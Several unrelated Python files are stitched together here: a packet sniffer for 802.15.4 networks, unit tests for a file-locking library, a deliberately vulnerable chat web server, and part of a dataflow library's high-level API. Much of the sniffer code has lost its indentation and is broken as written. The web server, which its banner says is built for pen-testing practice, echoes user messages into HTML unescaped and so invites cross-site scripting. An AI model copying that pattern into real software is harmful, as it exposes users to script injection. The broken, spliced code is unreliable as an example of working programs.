wpan_api.cmd_send(SPINEL.CMD_RESET)
time.sleep(1)
wpan_api.prop_set_value(SPINEL.PROP_PHY_ENABLED, 1)
result = wpan_api.prop_set_value(SPINEL.PROP_MAC_FILTER_MODE, SPINEL.MAC_FILTER_MODE_MONITOR)
if result is None:
return False
result = wpan_api.prop_set_value(SPINEL.PROP_PHY_CHAN, options.channel)
if result is None:
return False
result = wpan_api.prop_set_value(SPINEL.PROP_MAC_RAW_STREAM_ENABLED, 1)
if result is None:
return False
return True
# Seconds between liveness probes of the output FIFO.
FIFO_CHECK_INTERVAL = 0.1


def check_fifo(fifo):
    """Poll the output FIFO and hard-exit the process once the reader is gone.

    Runs forever on a background thread; uses os._exit() so the whole
    process dies immediately without waiting on other threads.
    """
    if sys.platform == 'win32':
        # On Windows, probe the pipe with a zero-byte WriteFile; specific
        # error codes indicate the reader end has disconnected.
        kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
        handle = msvcrt.get_osfhandle(fifo.fileno())
        data = b''
        p_data = ctypes.c_char_p(data)
        written = ctypes.c_ulong(0)
        while True:
            time.sleep(FIFO_CHECK_INTERVAL)
            if not kernel32.WriteFile(handle, p_data, 0, ctypes.byref(written), None):
                error = ctypes.get_last_error()
                if error in (
                    0xe8,  # ERROR_NO_DATA
                    0xe9,  # ERROR_PIPE_NOT_CONNECTED
                ):
                    os._exit(0)
                else:
                    raise ctypes.WinError(error)
    else:
        # On POSIX, stat() of the FIFO path fails once it is removed.
        while True:
            time.sleep(FIFO_CHECK_INTERVAL)
            try:
                os.stat(fifo.name)
            except OSError:
                os._exit(0)
def main():
""" Top-level main for sniffer host-side tool. """
(options, remaining_args) = parse_args()
if options.debug:
CONFIG.debug_set_level(options.debug)
if options.use_host_timestamp:
print('WARNING: Using host timestamp, may be inaccurate', file=sys.stderr)
# Set default stream to pipe
stream_type = 'p'
stream_descriptor = "../../examples/apps/ncp/ot-ncp-ftd "+options.nodeid
if options.uart:
stream_type = 'u'
stream_descriptor = options.uart
elif options.socket:
stream_type = 's'
stream_descriptor = options.socket
elif options.pipe:
stream_type = 'p'
stream_descriptor = options.pipe
if options.nodeid:
stream_descriptor += " "+str(options.nodeid)
else:
if len(remaining_args) > 0:
stream_descriptor = " ".join(remaining_args)
stream = StreamOpen(stream_type, stream_descriptor, False, options.baudrate, options.rtscts)
if stream is None:
exit()
wpan_api = WpanApi(stream, options.nodeid)
result = sniffer_init(wpan_api, options)
if not result:
sys.stderr.write("ERROR: failed to initialize sniffer\n")
exit()
else:
sys.stderr.write("SUCCESS: sniffer initialized\nSniffing...\n")
pcap = PcapCodec()
hdr = pcap.encode_header(DLT_IEEE802_15_4_TAP if options.tap else DLT_IEEE802_15_4_WITHFCS)
if options.hex:
hdr = util.hexify_str(hdr)+"\n"
if options.output:
output = open(options.output, 'wb')
elif hasattr(sys.stdout, 'buffer'):
output = sys.stdout.buffer
else:
output = sys.stdout
output.write(hdr)
output.flush()
if options.is_fifo:
threading.Thread(target=check_fifo, args=(output,)).start()
epoch = datetime(1970, 1, 1)
timebase = datetime.utcnow() - epoch
timebase_sec = timebase.days * 24 * 60 * 60 + timebase.seconds
timebase_usec = timebase.microseconds
try:
tid = SPINEL.HEADER_ASYNC
prop_id = SPINEL.PROP_STREAM_RAW
while True:
result = wpan_api.queue_wait_for_prop(prop_id, tid)
if result and result.prop == prop_id:
length = wpan_api.parse_S(result.value)
pkt = result.value[2:2+length]
# metadata format (totally 19 bytes):
# 0. RSSI(int8)
# 1. Noise Floor(int8)
# 2. Flags(uint16)
# 3. PHY-specific data struct contains:
# 3.0 Channel(uint8)
# 3.1 LQI(uint8)
# 3.2 Timestamp in microseconds(uint64)
# 4. Vendor data struct contains:
# 4.0 Receive error(uint8)
if len(result.value) == 2+length+19:
metadata = wpan_api.parse_fields(result.value[2+length:2+length+19], "ccSt(CCX)t(i)")
timestamp = metadata[3][2]
timestamp_sec = timestamp / 1000000
timestamp_usec = timestamp % 1000000
# (deprecated) metadata format (totally 17 bytes):
# 0. RSSI(int8)
# 1. Noise Floor(int8)
# 2. Flags(uint16)
# 3. PHY-specific data struct contains:
# 3.0 Channel(uint8)
# 3.1 LQI(uint8)
# 3.2 Timestamp Msec(uint32)
# 3.3 Timestamp Usec(uint16)
# 4. Vendor data struct contains:
# 4.0 Receive error(uint8)
elif len(result.value) == 2+length+17:
metadata = wpan_api.parse_fields(result.value[2+length:2+length+17], "ccSt(CCLS)t(i)")
timestamp_usec = timebase_usec + metadata[3][2] * 1000 + metadata[3][3]
timestamp_sec = timebase_sec + timestamp_usec / 1000000
timestamp_usec = timestamp_usec % 1000000
# Some old version NCP doesn't contain timestamp information in metadata
else:
timestamp = datetime.utcnow() - epoch
timestamp_sec = timestamp.days * 24 * 60 * 60 + timestamp.seconds
timestamp_usec = timestamp.microseconds
if options.rssi:
sys.stderr.write("WARNING: failed to display RSSI, please update the NCP version\n")
if options.use_host_timestamp:
timestamp = round(time.time() * 1000000)
timestamp_sec = timestamp // 1000000
timestamp_usec = timestamp % 1000000
pkt = pcap.encode_frame(pkt, int(timestamp_sec), timestamp_usec, options.rssi, options.crc, metadata)
if options.hex:
pkt = util.hexify_str(pkt)+"\n"
output.write(pkt)
output.flush()
except KeyboardInterrupt:
pass
if wpan_api:
wpan_api.stream.close()
output.close()
if __name__ == "__main__":
main()
|
locking.py | import random
import time
from threading import Thread, Lock as ThreadingLock
from traceback import format_exc
import pytest
from ..helpers import daemonize
from ..platform import get_process_id, process_alive
from ..locking import TimeoutTimer, ExclusiveLock, Lock, LockRoster, \
ADD, REMOVE, SHARED, EXCLUSIVE, LockTimeout, NotLocked, NotMyLock
# Fake (host, pid, thread_id) lock-owner identities used throughout the tests.
ID1 = "foo", 1, 1
ID2 = "bar", 2, 2
# Tuning knobs for the lock race-condition stress test below.
RACE_TEST_NUM_THREADS = 40
RACE_TEST_DURATION = 0.4  # seconds
@pytest.fixture()
def free_pid():
    """Return a free PID not used by any process (naturally this is racy)"""
    host, pid, tid = get_process_id()
    # PIDs are often restricted to a small range. On Linux the range >32k is
    # by default not used, so draw candidates from there until one is free.
    candidate = random.randint(33000, 65000)
    while process_alive(host, candidate, tid):
        candidate = random.randint(33000, 65000)
    return candidate
class TestTimeoutTimer:
    """Sanity checks for TimeoutTimer in timeout and sleep modes."""

    def test_timeout(self):
        limit = 0.5
        timer = TimeoutTimer(limit).start()
        assert not timer.timed_out()
        # Sleep well past the limit so the timer must report expiry.
        time.sleep(limit * 1.5)
        assert timer.timed_out()

    def test_notimeout_sleep(self):
        limit, interval = None, 0.5
        timer = TimeoutTimer(limit, interval).start()
        # With no timeout configured, each call sleeps one interval
        # and reports "not timed out".
        assert not timer.timed_out_or_sleep()
        assert time.time() >= timer.start_time + 1 * interval
        assert not timer.timed_out_or_sleep()
        assert time.time() >= timer.start_time + 2 * interval
@pytest.fixture()
def lockpath(tmpdir):
    # Path for the lock under test, inside pytest's per-test tmpdir.
    return str(tmpdir.join('lock'))
class TestExclusiveLock:
    """Tests for ExclusiveLock: acquire/release, breaking, staleness, races."""

    def test_checks(self, lockpath):
        # Inside the context we must hold the lock ourselves.
        with ExclusiveLock(lockpath, timeout=1) as lock:
            assert lock.is_locked() and lock.by_me()

    def test_acquire_break_reacquire(self, lockpath):
        # Breaking a held lock lets another id acquire it.
        lock = ExclusiveLock(lockpath, id=ID1).acquire()
        lock.break_lock()
        with ExclusiveLock(lockpath, id=ID2):
            pass

    def test_timeout(self, lockpath):
        # A second id cannot acquire while ID1 holds the lock.
        with ExclusiveLock(lockpath, id=ID1):
            with pytest.raises(LockTimeout):
                ExclusiveLock(lockpath, id=ID2, timeout=0.1).acquire()

    def test_kill_stale(self, lockpath, free_pid):
        host, pid, tid = our_id = get_process_id()
        # Same-host id with a dead pid: provably stale, may be killed.
        dead_id = host, free_pid, tid
        # Remote-host id: liveness cannot be determined, must never be killed.
        cant_know_if_dead_id = 'foo.bar.example.net', 1, 2
        dead_lock = ExclusiveLock(lockpath, id=dead_id).acquire()
        with ExclusiveLock(lockpath, id=our_id):
            # Acquiring killed the stale lock, so releasing it is NotMyLock...
            with pytest.raises(NotMyLock):
                dead_lock.release()
        # ...and once we released, it is not locked at all.
        with pytest.raises(NotLocked):
            dead_lock.release()
        with ExclusiveLock(lockpath, id=cant_know_if_dead_id):
            # Unknown-liveness locks are left alone: we time out instead.
            with pytest.raises(LockTimeout):
                ExclusiveLock(lockpath, id=our_id, timeout=0.1).acquire()

    def test_migrate_lock(self, lockpath):
        old_id, new_id = ID1, ID2
        assert old_id[1] != new_id[1]  # different PIDs (like when doing daemonize())
        lock = ExclusiveLock(lockpath, id=old_id).acquire()
        assert lock.id == old_id  # lock is for old id / PID
        old_unique_name = lock.unique_name
        assert lock.by_me()  # we have the lock
        lock.migrate_lock(old_id, new_id)  # fix the lock
        assert lock.id == new_id  # lock corresponds to the new id / PID
        new_unique_name = lock.unique_name
        assert lock.by_me()  # we still have the lock
        assert old_unique_name != new_unique_name  # locking filename is different now

    def test_race_condition(self, lockpath):
        # Hammer one lock from many threads; exclusivity must never break.
        class SynchronizedCounter:
            # Thread-safe counter tracking current and maximum concurrency.
            def __init__(self, count=0):
                self.lock = ThreadingLock()
                self.count = count
                self.maxcount = count

            def value(self):
                with self.lock:
                    return self.count

            def maxvalue(self):
                with self.lock:
                    return self.maxcount

            def incr(self):
                with self.lock:
                    self.count += 1
                    if self.count > self.maxcount:
                        self.maxcount = self.count
                    return self.count

            def decr(self):
                with self.lock:
                    self.count -= 1
                    return self.count

        def print_locked(msg):
            # Serialize output (closes over print_lock, assigned below;
            # lookup happens at call time, so the later binding is fine).
            with print_lock:
                print(msg)

        def acquire_release_loop(id, timeout, thread_id, lock_owner_counter, exception_counter, print_lock, last_thread=None):
            print_locked("Thread %2d: Starting acquire_release_loop(id=%s, timeout=%d); lockpath=%s" % (thread_id, id, timeout, lockpath))
            timer = TimeoutTimer(timeout, -1).start()
            cycle = 0
            while not timer.timed_out():
                cycle += 1
                try:
                    with ExclusiveLock(lockpath, id=id, timeout=timeout/20, sleep=-1):  # This timeout is only for not exceeding the given timeout by more than 5%. With sleep<0 it's constantly polling anyway.
                        lock_owner_count = lock_owner_counter.incr()
                        print_locked("Thread %2d: Acquired the lock. It's my %d. loop cycle. I am the %d. who has the lock concurrently." % (thread_id, cycle, lock_owner_count))
                        time.sleep(0.005)
                        lock_owner_count = lock_owner_counter.decr()
                        print_locked("Thread %2d: Releasing the lock, finishing my %d. loop cycle. Currently, %d colleagues still have the lock." % (thread_id, cycle, lock_owner_count))
                except LockTimeout:
                    print_locked("Thread %2d: Got LockTimeout, finishing my %d. loop cycle." % (thread_id, cycle))
                except:
                    exception_count = exception_counter.incr()
                    e = format_exc()
                    print_locked("Thread %2d: Exception thrown, finishing my %d. loop cycle. It's the %d. exception seen until now: %s" % (thread_id, cycle, exception_count, e))
            print_locked("Thread %2d: Loop timed out--terminating after %d loop cycles." % (thread_id, cycle))
            if last_thread is not None:  # joining its predecessor, if any
                last_thread.join()

        print('')
        lock_owner_counter = SynchronizedCounter()
        exception_counter = SynchronizedCounter()
        print_lock = ThreadingLock()
        thread = None
        # Threads form a join chain: each worker joins its predecessor,
        # so joining the last one waits for all of them.
        for thread_id in range(RACE_TEST_NUM_THREADS):
            thread = Thread(target=acquire_release_loop, args=(('foo', thread_id, 0), RACE_TEST_DURATION, thread_id, lock_owner_counter, exception_counter, print_lock, thread))
            thread.start()
        thread.join()  # joining the last thread
        assert lock_owner_counter.maxvalue() > 0, 'Never gained the lock? Something went wrong here...'
        assert lock_owner_counter.maxvalue() <= 1, "Maximal number of concurrent lock holders was %d. So exclusivity is broken." % (lock_owner_counter.maxvalue())
        assert exception_counter.value() == 0, "ExclusiveLock threw %d exceptions due to unclean concurrency handling." % (exception_counter.value())
class TestLock:
    """Tests for the shared/exclusive Lock built on top of LockRoster."""

    def test_shared(self, lockpath):
        # Two shared holders may coexist.
        lock1 = Lock(lockpath, exclusive=False, id=ID1).acquire()
        lock2 = Lock(lockpath, exclusive=False, id=ID2).acquire()
        assert len(lock1._roster.get(SHARED)) == 2
        assert len(lock1._roster.get(EXCLUSIVE)) == 0
        assert not lock1._roster.empty(SHARED, EXCLUSIVE)
        assert lock1._roster.empty(EXCLUSIVE)
        lock1.release()
        lock2.release()

    def test_exclusive(self, lockpath):
        with Lock(lockpath, exclusive=True, id=ID1) as lock:
            assert len(lock._roster.get(SHARED)) == 0
            assert len(lock._roster.get(EXCLUSIVE)) == 1
            assert not lock._roster.empty(SHARED, EXCLUSIVE)

    def test_upgrade(self, lockpath):
        # Shared -> exclusive; a second upgrade is a no-op.
        with Lock(lockpath, exclusive=False) as lock:
            lock.upgrade()
            lock.upgrade()  # NOP
            assert len(lock._roster.get(SHARED)) == 0
            assert len(lock._roster.get(EXCLUSIVE)) == 1
            assert not lock._roster.empty(SHARED, EXCLUSIVE)

    def test_downgrade(self, lockpath):
        # Exclusive -> shared; a second downgrade is a no-op.
        with Lock(lockpath, exclusive=True) as lock:
            lock.downgrade()
            lock.downgrade()  # NOP
            assert len(lock._roster.get(SHARED)) == 1
            assert len(lock._roster.get(EXCLUSIVE)) == 0

    def test_got_exclusive_lock(self, lockpath):
        # got_exclusive_lock() tracks the acquire/release lifecycle.
        lock = Lock(lockpath, exclusive=True, id=ID1)
        assert not lock.got_exclusive_lock()
        lock.acquire()
        assert lock.got_exclusive_lock()
        lock.release()
        assert not lock.got_exclusive_lock()

    def test_break(self, lockpath):
        # break_lock() clears the roster so another id can acquire.
        lock = Lock(lockpath, exclusive=True, id=ID1).acquire()
        lock.break_lock()
        assert len(lock._roster.get(SHARED)) == 0
        assert len(lock._roster.get(EXCLUSIVE)) == 0
        with Lock(lockpath, exclusive=True, id=ID2):
            pass

    def test_timeout(self, lockpath):
        # All shared/exclusive conflict combinations must time out.
        with Lock(lockpath, exclusive=False, id=ID1):
            with pytest.raises(LockTimeout):
                Lock(lockpath, exclusive=True, id=ID2, timeout=0.1).acquire()
        with Lock(lockpath, exclusive=True, id=ID1):
            with pytest.raises(LockTimeout):
                Lock(lockpath, exclusive=False, id=ID2, timeout=0.1).acquire()
        with Lock(lockpath, exclusive=True, id=ID1):
            with pytest.raises(LockTimeout):
                Lock(lockpath, exclusive=True, id=ID2, timeout=0.1).acquire()

    def test_kill_stale(self, lockpath, free_pid):
        host, pid, tid = our_id = get_process_id()
        # Same-host id with a dead pid: stale, may be killed.
        dead_id = host, free_pid, tid
        # Remote id: liveness unknowable, must never be killed.
        cant_know_if_dead_id = 'foo.bar.example.net', 1, 2
        dead_lock = Lock(lockpath, id=dead_id, exclusive=True).acquire()
        roster = dead_lock._roster
        with Lock(lockpath, id=our_id):
            # Acquiring our shared lock killed the stale exclusive one.
            assert roster.get(EXCLUSIVE) == set()
            assert roster.get(SHARED) == {our_id}
        assert roster.get(EXCLUSIVE) == set()
        assert roster.get(SHARED) == set()
        with pytest.raises(KeyError):
            dead_lock.release()
        with Lock(lockpath, id=cant_know_if_dead_id, exclusive=True):
            with pytest.raises(LockTimeout):
                Lock(lockpath, id=our_id, timeout=0.1).acquire()

    def test_migrate_lock(self, lockpath):
        old_id, new_id = ID1, ID2
        assert old_id[1] != new_id[1]  # different PIDs (like when doing daemonize())
        # Exclusive lock survives id migration...
        lock = Lock(lockpath, id=old_id, exclusive=True).acquire()
        assert lock.id == old_id
        lock.migrate_lock(old_id, new_id)  # fix the lock
        assert lock.id == new_id
        lock.release()
        # ...and so does a shared lock.
        lock = Lock(lockpath, id=old_id, exclusive=False).acquire()
        assert lock.id == old_id
        lock.migrate_lock(old_id, new_id)  # fix the lock
        assert lock.id == new_id
        lock.release()
@pytest.fixture()
def rosterpath(tmpdir):
    # Path for a LockRoster file inside pytest's per-test tmpdir.
    return str(tmpdir.join('roster'))
class TestLockRoster:
    """Tests for LockRoster, the persisted registry of lock holders."""

    def test_empty(self, rosterpath):
        # A fresh roster loads and saves as an empty dict.
        roster = LockRoster(rosterpath)
        empty = roster.load()
        roster.save(empty)
        assert empty == {}

    def test_modify_get(self, rosterpath):
        # ADD/REMOVE round trips for two ids sharing one roster file.
        roster1 = LockRoster(rosterpath, id=ID1)
        assert roster1.get(SHARED) == set()
        roster1.modify(SHARED, ADD)
        assert roster1.get(SHARED) == {ID1, }
        roster2 = LockRoster(rosterpath, id=ID2)
        roster2.modify(SHARED, ADD)
        assert roster2.get(SHARED) == {ID1, ID2, }
        roster1 = LockRoster(rosterpath, id=ID1)
        roster1.modify(SHARED, REMOVE)
        assert roster1.get(SHARED) == {ID2, }
        roster2 = LockRoster(rosterpath, id=ID2)
        roster2.modify(SHARED, REMOVE)
        assert roster2.get(SHARED) == set()

    def test_kill_stale(self, rosterpath, free_pid):
        host, pid, tid = our_id = get_process_id()
        dead_id = host, free_pid, tid
        # put a dead local process lock into roster
        roster1 = LockRoster(rosterpath, id=dead_id)
        # Disabled here so the dead entry survives this setup phase.
        roster1.kill_stale_locks = False
        assert roster1.get(SHARED) == set()
        roster1.modify(SHARED, ADD)
        assert roster1.get(SHARED) == {dead_id}
        # put a unknown-state remote process lock into roster
        cant_know_if_dead_id = 'foo.bar.example.net', 1, 2
        roster1 = LockRoster(rosterpath, id=cant_know_if_dead_id)
        roster1.kill_stale_locks = False
        assert roster1.get(SHARED) == {dead_id}
        roster1.modify(SHARED, ADD)
        assert roster1.get(SHARED) == {dead_id, cant_know_if_dead_id}
        killer_roster = LockRoster(rosterpath)
        # Active kill_stale_locks here - does it kill the dead_id lock?
        assert killer_roster.get(SHARED) == {cant_know_if_dead_id}
        killer_roster.modify(SHARED, ADD)
        assert killer_roster.get(SHARED) == {our_id, cant_know_if_dead_id}
        other_killer_roster = LockRoster(rosterpath)
        # Active kill_stale_locks here - must not kill our_id lock since we're alive.
        assert other_killer_roster.get(SHARED) == {our_id, cant_know_if_dead_id}

    def test_migrate_lock(self, rosterpath):
        old_id, new_id = ID1, ID2
        assert old_id[1] != new_id[1]  # different PIDs (like when doing daemonize())
        roster = LockRoster(rosterpath, id=old_id)
        assert roster.id == old_id
        roster.modify(SHARED, ADD)
        assert roster.get(SHARED) == {old_id}
        roster.migrate_lock(SHARED, old_id, new_id)  # fix the lock
        assert roster.id == new_id
        assert roster.get(SHARED) == {new_id}
|
VulnerableWebServer.py | import socket, threading, sys
class WebServer:
    """Deliberately XSS-vulnerable HTTP chat server for pen-testing practice.

    NOTE(review): user input is echoed back into the HTML without any
    escaping on purpose (see gen_packet); never reuse outside a lab.
    """

    def __init__(self):
        # Parse argv: <ip> <port> [externalip]; self.valid gates listen().
        self.logo()
        self.valid = False
        try:
            self.ip = sys.argv[1]
            self.port = int(sys.argv[2])
            try:
                self.externalip = sys.argv[3]
            except:
                # Optional third argument; fall back to the bind address.
                self.externalip = self.ip
            self.valid = True
        except Exception as e:
            print("[+] Invalid Arguments!\n[+] Usage: python3 VulnerableServer.py <ip> <port> <externalip>\n[+] Note: The External IP argument is optional.")
        if self.valid:
            try:
                self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.server.bind((self.ip, self.port))
                # Chat history; each entry is injected unescaped into the page.
                self.msgs = []
                self.packet = self.gen_packet()
                print(f"[+] Vulnerable Web Server Started on: {self.ip}:{self.port}")
            except Exception as e:
                print(f"[+] Server Cannot be started due to Error: {e}")
                self.valid = False

    def logo(self=None):
        # Print the ASCII-art banner. self=None lets it be called unbound.
        print("""
 __ __ _____ _____ __ __ _ _ _ _____ __ _____
\ \ / // ____/ ____| \ \ / / | | | | | | / ____| /_ | | ____|
 \ V /| (___| (___ _____\ \ / / _| |_ __ ___ _ __ __ _| |__ | | ___| (___ ___ _ ____ __ __ _| | | |__
 > < \___ \ ___ \______\ \/ / | | | | '_ \ / _ \ '__/ _` | '_ \| |/ _ \ ___ \ / _ \ '__\ \ / / \ \ / / | |___ \
 / . \ ____) |___) | \ /| |_| | | | | | __/ | | (_| | |_) | | __/____) | __/ | \ V / \ V /| |_ ___) |
/_/ \_\_____/_____/ \/ \__,_|_|_| |_|\___|_| \__,_|_.__/|_|\___|_____/ \___|_| \_/ \_/ |_(_)____/
 Vulnerable Web-Server Made for Pen-Testing By DrSquid
 """)

    def gen_packet(self):
        # Rebuild the HTML page: a form that submits via GET (?msg=...)
        # plus all stored messages, injected with no escaping (XSS vector).
        packet = f"""
 <title>Vulnerable Web Server</title>
 <h1>Horrific Looking Chat Server</h1>
 This is an anonoymous Chat Site.
 The Server is also made to be vulnerable to Cross site scripting attacks.
 <form action="http://{self.externalip}:{self.port}">
 <textarea name="msg" cols="50" rows="10" placeholder="Enter your message here."></textarea>
 <h1></h1>
 <input type="submit" value="Send Message">
 </form>
 """
        for i in self.msgs:
            packet += f"<h5>Anonoymous: {i}</h5>\n"
        return packet

    def listen(self):
        # Accept loop: one handler thread per connection. Logged client
        # address honors X-Forwarded-For (trivially spoofable).
        if self.valid:
            print("[+] Server is listening For Connections.....")
            while True:
                ipaddr = ""
                self.server.listen()
                conn, ip = self.server.accept()
                self.packet = self.gen_packet()
                # NOTE(review): assumes the whole request fits in 1024 bytes.
                msg = conn.recv(1024).decode()
                item = 0
                msg_split = msg.split()
                for i in msg_split:
                    if 'x-forwarded-for' in i.lower():
                        # The header value is the next whitespace token.
                        ipaddr = msg_split[item + 1]
                        break
                    item += 1
                if ipaddr == "":
                    ipaddr = ip[0]
                handler = threading.Thread(target=self.handler, args=(conn, msg, ipaddr))
                handler.start()

    def handler(self, conn, msg, ip):
        # Serve one request: decode the ?msg= query parameter by hand,
        # store it, and send back the regenerated page.
        try:
            conn.send('HTTP/1.0 200 OK\n'.encode())
            conn.send('Content-Type: text/html\n'.encode())
            # NOTE(review): no blank line is sent between headers and body;
            # lenient clients render it anyway -- confirm if intentional.
            if "/?msg=" in msg.split()[1]:
                try:
                    # Hand-rolled percent-decoding of common sequences
                    # (instead of urllib.parse.unquote_plus).
                    main_msg = str(msg).split()[1].split("=")[1].replace("+", " ").replace("%3C", "<").replace("%3E",">").replace(
                        "%2F", "/").replace("%22", '"').replace("%27", "'").replace("%3D", "=").replace("%2B","+").replace(
                        "%3A", ":").replace("%28", "(").replace("%29", ")").replace("%2C", ",").replace("%3B",";").replace(
                        "%20", " ").replace("%3F", "?").replace("%5C","\\").replace("%7B", "{").replace("%7D","}").replace(
                        "%24", "$").replace("%0D", "\n").replace("%0A", " ").replace("%40","@")
                    if main_msg.strip() != "":
                        print(f"[+] {ip}: {main_msg}")
                        self.msgs.append(main_msg)
                        self.packet = self.gen_packet()
                except:
                    pass
            conn.send(self.packet.encode())
            conn.close()
        except:
            pass
# Entry point guarded so importing this module does not parse sys.argv,
# print the banner, or bind a socket as a side effect.
if __name__ == "__main__":
    serv = WebServer()
    serv.listen()
|
high_level.py | """
High level abstraction interfaces to DFFML. These are probably going to be used
in a lot of quick and dirty python files.
"""
import asyncio
import pathlib
from typing import Optional, Tuple, List, Union, Dict, Any, AsyncIterator
from .record import Record
from .df.types import DataFlow, Input
from .df.memory import MemoryOrchestrator
from .source.source import Sources, BaseSource
from .source.memory import MemorySource, MemorySourceConfig
from .df.base import BaseInputSetContext, BaseOrchestrator, BaseInputSet
def _records_to_sources(*args):
    """
    Build the list of sources implied by a variable length argument list.

    If the first argument is already a ``Sources`` collection it becomes the
    base; otherwise a new one is built from any ``BaseSource`` arguments.
    ``dict`` and ``Record`` arguments are gathered into a single in-memory
    source, and strings containing a ``.`` are treated as filenames whose
    extension selects the source type to load. The resulting ``Sources``
    collection is returned.
    """
    if args and isinstance(args[0], Sources):
        sources = args[0]
    else:
        sources = Sources(
            *[item for item in args if isinstance(item, BaseSource)]
        )
    # Records destined for the in-memory source
    pending = []
    for index, item in enumerate(list(args)):
        # Bare feature dicts become Records keyed by their argument position
        if isinstance(item, dict):
            item = Record(index, data={"features": item})
        if isinstance(item, Record):
            pending.append(item)
        if isinstance(item, str) and "." in item:
            # Load a source class by file extension, instantiate it on the path
            loaded = BaseSource.load(pathlib.Path(item).suffix.replace(".", ""))
            sources.append(loaded(filename=item))
    if pending:
        sources.append(MemorySource(MemorySourceConfig(records=pending)))
    return sources
async def run(
    dataflow: DataFlow,
    *input_sets: Union[List[Input], BaseInputSet],
    orchestrator: Optional[BaseOrchestrator] = None,
    strict: bool = True,
    ctx: Optional[BaseInputSetContext] = None,
    halt: Optional[asyncio.Event] = None,
) -> AsyncIterator[Tuple[BaseInputSetContext, Dict[str, Any]]]:
    """
    Run a DataFlow
    Run a DataFlow using the default orchestrator
    (:py:class:`MemoryOrchestrator <dffml.df.memory.MemoryOrchestrator>`),
    or the specified one.
    Parameters
    ----------
    dataflow : DataFlow
        :py:class:`DataFlow <dffml.df.types.DataFlow>` to run.
    input_sets : InputSet, list, dict, optional
        :py:class:`Inputs <dffml.df.types.Input>` to give to the
        :py:class:`DataFlow <dffml.df.types.DataFlow>` when it starts. Can be in
        multiple formats.
        If each element is a ``list`` then it's expected that each element of
        that list be an :py:class:`Input <dffml.df.types.Input>`, in this case
        an :py:class:`InputSet <dffml.df.base.BaseInputSet>` will be created
        with a random string used as the
        :py:class:`StringInputSetContext <dffml.df.base.StringInputSetContext>`.
        If a ``dict`` is given then each key will become a
        :py:class:`StringInputSetContext <dffml.df.base.StringInputSetContext>`.
        The value for each key should be a ``list`` of
        :py:class:`Input <dffml.df.types.Input>` objects.
        If each element is a :py:class:`InputSet <dffml.df.base.BaseInputSet>`
        then each context
        :py:class:`InputSetContext <dffml.df.base.BaseInputSetContext>`
        will have its respective :py:class:`Inputs <dffml.df.types.Input>` added
        to it.
    orchestrator : BaseOrchestrator, optional
        Orchestrator to use, defaults to
        :py:class:`MemoryOrchestrator <dffml.df.memory.MemoryOrchestrator>`
        if ``None``.
    strict : bool, optional
        If true (default), raise exceptions when they occur in operations. If
        false, log exceptions without raising.
    ctx : BaseInputSetContext, optional
        If given and input_sets is a ``list`` then add inputs under the given
        context. Otherwise they are added under randomly generated contexts.
    halt : Event, optional
        If given, keep the dataflow running until this :py:class:`asyncio.Event`
        is set.
    Returns
    -------
    asynciterator
        ``tuple`` of
        :py:class:`InputSetContext <dffml.df.base.BaseInputSetContext>`
        and ``dict`` where contents are determined by output operations.
        If multiple output operations are used, then the top level keys will be
        the names of the output operations. If only one is used, then the
        ``dict`` will be whatever the return value of that output operation was.
    Examples
    --------
    The following creates a TCP echo server. We write an operation which uses a
    DataFlow to open a connection and send a message to the server.
    For the inputs to the DataFlow, we create 2 Input objects whose values are
    the message to be sent to the TCP server. We also create Input objects for
    the host and port. When running a DataFlow, operations will be run with each
    possible permutation of their inputs.
    .. TODO Autogenerate this image during docs build
    graph LR
        send_to_server
        1[First echo message]
        port[Port]
        host[Host]
        2[Second echo message]
        1_c[Host, Port, First echo]
        2_c[Host, Port, Second echo]
        host --> 1_c
        port --> 1_c
        2 --> 2_c
        port --> 2_c
        host --> 2_c
        1 --> 1_c
        1_c --> send_to_server
        2_c --> send_to_server
    .. image:: /images/high_level_run_echo_server_input_combination.svg
        :alt: Flow chart showing how both echo messages create a parameter set including that echo message and the host and port
    Because there is a different Input object for each of the 2 "echo" messages,
    one will get combined with the host and port to make an argument list for
    the ``send_to_server`` operation. The other also combines with the host and
    port to make another argument list. Both argument lists are used to call the
    ``send_to_server`` operation.
    >>> # Socket server derived from
    >>> # https://docs.python.org/3/library/socketserver.html#asynchronous-mixins
    >>> import asyncio
    >>> import threading
    >>> import socketserver
    >>> from dffml import *
    >>>
    >>> class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
    ...     def handle(self):
    ...         self.request.sendall(self.request.recv(1024))
    >>>
    >>> class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    ...     pass
    >>>
    >>> @op
    ... async def send_to_server(host: str, port: int, message: str):
    ...     reader, writer = await asyncio.open_connection(host, port)
    ...
    ...     writer.write(message.encode())
    ...     await writer.drain()
    ...
    ...     data = await reader.read(100)
    ...     print(f"Client sent {message!r}, got: {data.decode()!r}")
    ...
    ...     writer.close()
    ...     await writer.wait_closed()
    >>>
    >>> # List of messages to send to the server, 2 long, each value is "echo"
    >>> messages = [Input(value="echo", definition=send_to_server.op.inputs["message"])
    ...             for _ in range(0, 2)]
    >>>
    >>> # DataFlow consisting of the single operation
    >>> dataflow = DataFlow.auto(send_to_server)
    >>>
    >>> async def main():
    ...     # Create a server with and pass 0 to get a random port assigned
    ...     server = ThreadedTCPServer(("127.0.0.1", 0), ThreadedTCPRequestHandler)
    ...     with server:
    ...         host, port = server.server_address
    ...
    ...         # Start a thread to run the server in the background
    ...         server_thread = threading.Thread(target=server.serve_forever)
    ...         # Exit the server thread when the main thread terminates
    ...         server_thread.daemon = True
    ...         server_thread.start()
    ...
    ...         # Add the host and port to the list of Inputs for the DataFlow
    ...         inputs = messages + [
    ...             Input(value=host, definition=send_to_server.op.inputs["host"]),
    ...             Input(value=port, definition=send_to_server.op.inputs["port"])
    ...         ]
    ...
    ...         try:
    ...             async for ctx, results in run(dataflow, inputs):
    ...                 pass
    ...         finally:
    ...             server.shutdown()
    >>>
    >>> asyncio.run(main())
    Client sent 'echo', got: 'echo'
    Client sent 'echo', got: 'echo'
    """
    if orchestrator is None:
        # Fall back to the in-memory orchestrator when the caller gave none.
        orchestrator = MemoryOrchestrator.withconfig({})
    async with orchestrator:
        # Bind the orchestrator to this dataflow, then stream (context, results)
        # pairs produced by output operations as they complete.
        async with orchestrator(dataflow) as ctx:
            async for ctx, results in ctx.run(*input_sets):
                yield ctx, results
async def save(source: BaseSource, *args: Record) -> None:
    """
    Update a source's knowledge about given records.
    For each record given, call
    :py:func:`update <dffml.source.source.BaseSourceContext.update>` on the
    source. Effectively saving all the records to the source.
    Parameters
